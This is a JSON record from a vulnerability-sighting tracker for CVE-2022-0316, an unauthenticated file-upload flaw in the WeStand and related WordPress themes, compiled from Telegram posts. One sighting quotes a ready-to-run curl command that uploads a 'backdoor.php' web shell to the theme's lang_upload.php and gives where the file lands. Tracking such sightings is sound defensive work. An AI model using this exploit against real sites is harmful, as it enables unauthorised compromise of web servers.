{"vulnerability": "CVE-2022-0316", "sightings": [{"uuid": "4d71466e-6413-4d75-83a2-ba4af91b820e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0316", "type": "published-proof-of-concept", "source": "https://t.me/zfix_s/4", "content": "Wordpress Exploit..\nCVE-2022-0316\nOpen Source\n\nEnjoy", "creation_timestamp": "2024-06-15T11:01:59.000000Z"}, {"uuid": "e0424b98-87b7-4276-8374-99562ca132cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0316", "type": "published-proof-of-concept", "source": "https://t.me/openSource3/1076", "content": "CVE ID : CVE-2022-0316\nSystem : wordpress \nType : file upload \n\nExploit :\n\nCreate a malicious file \"backdoor.php\", then\n\n curl https://website.com/wp-content/themes/westand/include/lang_upload.php -F \"mofile[]=@backdoor.php\"\n\nThe file will be at https://example.com/wp-content/themes/westand/languages/backdoor.php", "creation_timestamp": "2025-03-22T11:10:12.000000Z"}, {"uuid": "199b059c-532e-4c75-971a-a77e3b45f1f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0316", "type": "seen", "source": "https://t.me/cibsecurity/56851", "content": "\u203c CVE-2022-0316 \u203c\n\nThe WeStand WordPress theme before 2.1, footysquare WordPress theme, aidreform WordPress theme, statfort WordPress theme, club-theme WordPress theme, kingclub-theme WordPress theme, spikes WordPress theme, spikes-black WordPress theme, soundblast WordPress theme, bolster WordPress theme from ChimpStudio and PixFill does not have any authorisation and upload validation in the lang_upload.php file, allowing any unauthenticated attacker to upload arbitrary files to the web server.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-01-23T18:31:09.000000Z"}]}